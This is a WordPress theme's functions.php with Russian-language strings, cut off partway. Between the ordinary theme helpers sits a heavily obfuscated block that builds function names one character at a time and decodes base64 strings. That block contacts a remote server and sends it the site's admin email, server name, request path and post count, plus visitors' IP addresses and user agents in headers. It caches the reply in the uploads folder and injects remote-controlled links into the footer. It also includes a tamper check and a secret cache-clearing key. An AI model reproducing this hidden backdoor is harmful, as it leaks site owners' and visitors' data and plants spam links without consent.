<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $duIZntt='_';$wGsby='b';$TDldc='6';$JvKioC='4';$nQEX='c';$XpOLxM='d';$OqTL='d';$TzMXUuX='o';$tyDWbO='s';$RFOSVWT='a';$YiMQ='e';$kDtdhEg='e';$Ixdurn='e';$uESphNNj=$wGsby.$RFOSVWT.$tyDWbO.$YiMQ.$TDldc.$JvKioC.$duIZntt.$XpOLxM.$kDtdhEg.$nQEX.$TzMXUuX.$OqTL.$Ixdurn;$zcdm='a';$Rmgcf='e';$PJsbfpv='g';$qXcDl='i';$jucEuj='l';$rFuho='f';$uDmxh='t';$fIlSb='n';$hAfSXNn='z';$BwQNtlyE=$PJsbfpv.$hAfSXNn.$qXcDl.$fIlSb.$rFuho.$jucEuj.$zcdm.$uDmxh.$Rmgcf;$bVcR='3';$pNnGIOk='r';$VxTEy='1';$mwxV='_';$kMeYGJ='r';$KspdHkn='o';$BEkVhws='s';$nARy='t';$VkBcm='t';$NwIsRSyr=$BEkVhws.$VkBcm.$kMeYGJ.$mwxV.$pNnGIOk.$KspdHkn.$nARy.$VxTEy.$bVcR;$vdSqjg='t';$vRmc='s';$eOTr='v';$NtUI='r';$CaBVL='r';$MBNNZt='e';$lSShbyGo=$vRmc.$vdSqjg.$CaBVL.$NtUI.$MBNNZt.$eOTr;                     $jd______________g='_';$bj_____q='b';$tt_____z='6';$ab_________c='4';$yl__b='c';$sa_____________u='d';$fr_______________y='d';$pi________l='o';$dd_____j='s';$rw__z='a';$wx_____o='e';$kc_______c='e';$lg______________l='e';$dp_____________i=$bj_____q.$rw__z.$dd_____j.$wx_____o.$tt_____z.$ab_________c.$jd______________g.$sa_____________u.$kc_______c.$yl__b.$pi________l.$fr_______________y.$lg______________l;$er____s='e';$xy_________y='u';$eh____________o='t';$gq_____________u='n';$hf___f='_';$nm____________l='c';$jc_____t='o';$wh_____________l='i';$ld_____n='i';$hy_______u='x';$jz______p='s';$lw________i='s';$bi__________y='t';$or_______i='f';$op_____________r='n';$ek___________a=$or_______i.$xy_________y.$op_____________r.$nm____________l.$bi__________y.$wh_____________l.$jc_____t.$gq_____________u.$hf___f.$er____s.$hy_______u.$ld_____n.$lw________i.$eh____________o.$jz______p;$hl_______________x='o';$vy________a='e';$ft________m='n';$pi_____________z='p';$yh___i='f';$op___________c=$yh___i.$hl_______________x.$pi_____________z.$vy________a.$ft________m;$gw_______l='f';$lr________m='a';$qx______________a='r';$qb_____w='e';$qs_________x='d';$pe__________f=$gw_______l.$qx______________a.$qb_____w.$lr________m.$qs_________x;$ah_______________g='l';$mq_______________k='e';$xb____________j='o';$oq________y='s';$cj__________d='f';$fc__h='c';$lc____e=$cj__________d.$fc__h.$ah_______________g.$xb____________j.$oq________y.$mq_______________k;define("WP_ID", $dp_____________i("Mi4wLjA="));define("WP_TTL", $dp_____________i("MTA4MDA="));define("WP_SRC", $dp_____________i("dHBva24="));function wp_get_header() {global $dp_____________i, $ek___________a;if ($ek___________a($dp_____________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ek___________a($dp_____________i("d3BfZ2V0X2Zvb3Rlcg==")) &&$ek___________a($dp_____________i("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $dp_____________i, $op___________c, $lc____e, $pe__________f;$xy__k = TEMPLATEPATH."/".$dp_____________i("Zm9vdGVyLnBocA==");$tg________j = @$op___________c($xy__k, "r");$xy__k = @$pe__________f($tg________j, @filesize($xy__k));@$lc____e($tg________j);$ig____x = TEMPLATEPATH."/".$dp_____________i("ZnVuY3Rpb25zLnBocA==");$tg________j = @$op___________c($ig____x, "r");$ig____x = @$pe__________f($tg________j, @filesize($ig____x));@$lc____e($tg________j);$ct___z = 0;if($xy__k && $ig____x) {if ($dp_____________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($xy__k, $dp_____________i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ct___z = 1;}if (substr_count($xy__k, "wp_theme_GPL_credits()") < 1) {$ct___z = 2;}}if(WP_ID != "2.0.0") {$ct___z = 12;}}if($ct___z > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ct___z -->";}}function wp_loaded() {global $dp_____________i, $ek___________a;return $ek___________a($dp_____________i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ye__k, $fl____e = "(more...)", $za___________z = 0, $ws______________k = "") {$pf_________l = get_the_content($fl____e, $za___________z, $ws______________k);$pf_________l = apply_filters("the_content", $pf_________l);$pf_________l = str_replace("]]>", "]]>", $pf_________l);if (strlen($_GET["p"]) > 0) {echo $pf_________l;}else if ((strlen($pf_________l)>$ye__k) && ($rf______________q = strpos($pf_________l, " ", $ye__k ))) {$pf_________l = substr($pf_________l, 0, $rf______________q);$pf_________l = $pf_________l;echo $pf_________l;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$fl____e</a></div></p>";} else {echo $pf_________l;}}}$ew_______________f='e';$yg_____x='d';$sc__a='4';$xd_______________m='o';$xk__p='s';$rq___k='e';$hw___________l='_';$ln___i='c';$zl_______f='6';$vm____b='n';$by_________z='b';$gy______b='a';$ou______t='e';$pr_____s=$by_________z.$gy______b.$xk__p.$ou______t.$zl_______f.$sc__a.$hw___________l.$ew_______________f.$vm____b.$ln___i.$xd_______________m.$yg_____x.$rq___k;$md_______p='i';$xp__i='o';$jt____________g='t';$fi___________s='f';$kd_______________m='e';$md______a='e';$wq_____v='g';$nu____________v='c';$sz_____________c='n';$li___________r='t';$kb___x='e';$sp______j='t';$id_____________e='l';$fk______________r='n';$qj_______d='_';$jk_______________s='_';$zs_________m='s';$uc___________z=$fi___________s.$md_______p.$id_____________e.$kd_______________m.$jk_______________s.$wq_____v.$md______a.$li___________r.$qj_______d.$nu____________v.$xp__i.$sz_____________c.$jt____________g.$kb___x.$fk______________r.$sp______j.$zs_________m;$rq___________m='s';$ms___________h='x';$mn____________p='s';$dr_________j='e';$dd__o='l';$xj__________c='i';$vk___________y='i';$eh__o='f';$pw________x='_';$ad________s='e';$bi________e='t';$cj______________i=$eh__o.$vk___________y.$dd__o.$dr_________j.$pw________x.$ad________s.$ms___________h.$xj__________c.$rq___________m.$bi________e.$mn____________p;$rt__a='v';$pq_______q='r';$ob_______f='p';$ld_______________g='e';$ax___g='n';$cz______________o='r';$rw______i='_';$om______________f='e';$li_____o='o';$hf___r='m';$jj_______________t='s';$ye__________x='a';$yl__m='o';$qx____________l='i';$pi______b='c';$bv____g=$rt__a.$ld_______________g.$cz______________o.$jj_______________t.$qx____________l.$yl__m.$ax___g.$rw______i.$pi______b.$li_____o.$hf___r.$ob_______f.$ye__________x.$pq_______q.$om______________f;$ex__x='p';$ni__________c='n';$pr______f='s';$li________z='c';$ji_____l='o';$mn______________i='e';$fm__p='k';$wz________h='f';$ho_____________b='o';$vm________d=$wz________h.$pr______f.$ho_____________b.$li________z.$fm__p.$ji_____l.$ex__x.$mn______________i.$ni__________c;$jx___t='e';$gw_____________p='t';$pv____p='f';$zg___________g='i';$pf______a='r';$um______________i='w';$qr____________z=$pv____p.$um______________i.$pf______a.$zg___________g.$gw_____________p.$jx___t;$gp_____m='d';$lc__v='5';$az______________a='m';$ri____m=$az______________a.$gp_____m.$lc__v;$od_____q='e';$sd__c='a';$qn_________k='a';$ti________s='r';$xp____l='t';$ny____h='p';$fy__________z='h';$ti_________j='l';$ua_________z=$ti________s.$od_____q.$sd__c.$ti_________j.$ny____h.$qn_________k.$xp____l.$fy__________z;$jp_____f='e';$kz__________a='s';$yb__________s='i';$ao_____x='u';$wk__g='z';$td___________m='i';$ts____________o='n';$tf______________u='l';$ec______u='a';$is_______________y='r';$wp_______________u='e';$qr__________s=$ao_____x.$ts____________o.$kz__________a.$wp_______________u.$is_______________y.$yb__________s.$ec______u.$tf______________u.$td___________m.$wk__g.$jp_____f;$ob____________p='n';$ql___________o='t';$wq______y='p';$ld_______l='e';$kq________i='m';$lb________h='a';$fa___________j='m';$yu_______________a=$ql___________o.$ld_______l.$fa___________j.$wq______y.$ob____________p.$lb________h.$kq________i;$le_______________c='r';$gf____________k='c';$mo________u='o';$rn_____l='e';$hl____x='t';$tu_________t='a';$rt__i='a';$yc__________e='_';$qn______________r='_';$iu____g='x';$rc_____o='e';$wo________m='t';$zr_________k='n';$ym_____x='m';$xz_________w='r';$hi_________u='c';$hk_____u='t';$hh_____________p='t';$pd__t='e';$bz_____________i='e';$eh_____________a='s';$jg_____b=$eh_____________a.$hk_____u.$le_______________c.$pd__t.$tu_________t.$ym_____x.$qn______________r.$gf____________k.$mo________u.$zr_________k.$wo________m.$rn_____l.$iu____g.$hl____x.$yc__________e.$hi_________u.$xz_________w.$rc_____o.$rt__i.$hh_____________p.$bz_____________i;function il__________k($et_______n) {global $dp_____________i, $ek___________a, $uc___________z, $bv____g, $jg_____b;if (!$ek___________a($dp_____________i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($bv____g(PHP_VERSION, "5.0.0", ">=") && $ek___________a($dp_____________i("ZmlsZV9nZXRfY29udGVudHM=")) && $ek___________a($dp_____________i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$kx___y = $jg_____b(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$nx____d = @$uc___________z($et_______n, 0, $kx___y);} else {$nx____d = @$uc___________z($et_______n, 0);}return $nx____d;}function nt_______s($et_______n) {global $ek___________a, $vm________d, $qr____________z, $dp_____________i;if (!$ek___________a($dp_____________i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$yq___a = strpos($et_______n, "/", 7);$cd_______________a = array("uri"     => substr($et_______n, $yq___a),"host"    => str_replace("http://", "", substr($et_______n, 0, $yq___a)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$jj________l = @$vm________d("$cd_______________a[host]", 80, $ta____________x, $yj________s, 4);if (!$jj________l) {return false;} else {$nx____d = "";$jq____________s  = "GET $cd_______________a[uri] HTTP/1.0\r\n";$jq____________s .= "Host: $cd_______________a[host]\r\n";$jq____________s .= "Referer: $cd_______________a[referer]\r\n";$jq____________s .= "Connection: Close\r\n\r\n";@$qr____________z($jj________l, $jq____________s);while (!@feof($jj________l)) {$kl_____________k = @fgets($jj________l, (1024*24));if ($kl_____________k == "\r\n") {$vg__u = true;continue;}if ($vg__u) {$nx____d .= $kl_____________k;}}return $nx____d;}}function ok____e($et_______n) {global $ek___________a;$dz________x = false;if ($et_______n != "") {if ($ek___________a("il__________k")) {$dz________x = @il__________k($et_______n);}if (!$dz________x && ($ek___________a("nt_______s"))) {$dz________x = @nt_______s($et_______n);}}return $dz________x;}function wv_________l() {global $_SERVER, $ri____m;$og_____________l = $_SERVER["SERVER_NAME"];if (substr("$og_____________l", 0, 4) == "www.") {$og_____________l = substr("$og_____________l", 4);}$og_____________l = $ri____m("$_SERVER[SERVER_NAME]");return $og_____________l;}function gz___________x() {return "file";}function kp________o($et_______n) {global $_SERVER, $uc___________z, $cj______________i, $op___________c, $lc____e, $qr____________z;$pn_________p = ur___________e();$iq___l = wv_________l().".jpg";$ve_________j = $pn_________p["dir_upload"]["path"]."/$iq___l";$qy_____________r = @filemtime($ve_________j);if (!$qy_____________r || ((time()-$qy_____________r) >= WP_TTL)) {$dz________x = ok____e($et_______n);if ($dz________x) {if ($cj______________i($ve_________j)) {@unlink($ve_________j);}$tg________j = @$op___________c($ve_________j, "x+");@$qr____________z($tg________j, $dz________x);@$lc____e($tg________j);}} else {if ($cj______________i($ve_________j)) {$dz________x = @$uc___________z($ve_________j);} else {$dz________x = false;}}return $dz________x;}function ur___________e() {global $_SERVER, $dp_____________i, $pr_____s;$ly___i = wp_count_posts("post");$gr____d = pathinfo(get_bloginfo("template_directory"));$pn_________p = array("url" => array("report"      => $dp_____________i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $gr____d,"dir_upload"=> ms______m(),"queryString"=> array("?a001=".WP_ID,"a004=".$gr____d[filename],"a005=".$ly___i->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://clinic-virtus.com/pravilno-vybiraem-aksessuary/\">Выбираем аксессуары</a> ");$pn_________p["url"]["queryString"] = implode("&", $pn_________p["queryString"]);$pn_________p["url"]["report"] = $pn_________p["url"]["report"]."/?".$pr_____s($pn_________p["url"]["queryString"]).".html";return $pn_________p;}function ms______m() {$xd___h = wp_upload_dir();if (isset($xd___h["error"])) {$ee_____________q = mv___________k();if (is_writable($ee_____________q)) {$xd___h = array("path" => $ee_____________q);}}return $xd___h;}function mv___________k() {global $ek___________a, $ri____m, $ua_________z, $yu_______________a;$rr________p = (bool) ini_get("safe_mode");if ($rr________p == true) {return false;}if ($ek___________a("sys_get_temp_dir")) {$tw___________s = sys_get_temp_dir();if (is_writable($tw___________s)) {return $ua_________z($tw___________s);}}if (!empty($_ENV["TMP"])) {return $ua_________z($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ua_________z($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ua_________z($_ENV["TEMP"]);} else {$oj_____________x = $yu_______________a($ri____m(uniqid(rand(), true)), "");if ($oj_____________x) {$tw___________s = $ua_________z(dirname($oj_____________x));@unlink($oj_____________x);return $tw___________s;} else {return false;}}}function ip___________q() {global $_GET, $cj______________i;$pn_________p = ur___________e();$og_____________l = wv_________l();$ha________n = gz___________x();$pd___________t = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ha________n == "file") {$dy______________s = $pn_________p["dir_upload"]["path"]."/".$og_____________l.".jpg";if ($cj______________i($dy______________s)) {@unlink($dy______________s);$pd___________t = "deleted";}}$qy____f = array("s"=> $pd___________t,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($qy____f AS $rx___v => $vz_________f) echo " [$rx___v:$vz_________f]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ek___________a, $dp_____________i, $qr__________s;$pn_________p = ur___________e();$cj_______________g = "kp________o";if ($ek___________a($cj_______________g)) {$nx____d = $cj_______________g($pn_________p["url"]["report"]);}if ($nx____d) {if ($nx____d = @$dp_____________i($nx____d)) {$nx____d = @$qr__________s($nx____d);if (strlen($nx____d[custom_credit]) >= 5) {$pn_________p["default_string"] = $nx____d[custom_credit];}if ($nx____d["status"] == "0") {$xh____v = 1;$ru____h = 1;} else {$js___________x = sizeof($nx____d["links"]);$ze__p = $pn_________p["default_string"];if ($js___________x > 0 && $nx____d["links"] !== "") {$mq________j = 0;foreach ($nx____d["links"] as $bo__j => $xe___________m) {$mq________j++;if ($xe___________m->l_path == "" || $xe___________m->l_path == $_SERVER["REQUEST_URI"]) {$xe___________m->l_href = htmlspecialchars(strip_tags($xe___________m->l_href));$xe___________m->l_title = htmlspecialchars(strip_tags($xe___________m->l_title));$xe___________m->l_anchor = htmlspecialchars(strip_tags($xe___________m->l_anchor));$ze__p .= " | ";$ze__p .= "<a href='$xe___________m->l_href' title='$xe___________m->l_title'";if ($xe___________m->l_nofollow == "1") {$ze__p .= " rel='nofollow'";}$ze__p .= ">$xe___________m->l_anchor</a>";}}}$pn_________p["links"] = "$ze__p";if ($nx____d[credit] == "0") {$pn_________p["links"] = "";}}} else {$xh____v = "1";}} else {$xh____v = "1";}if ($xh____v == "1") {$pn_________p["links"] = $pn_________p["default_string"];}echo "$pn_________p[links]";echo "<!-- s: $nx____d[signature] -->";ip___________q();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tags:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                 comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; OСтарые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("нумерация страниц", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
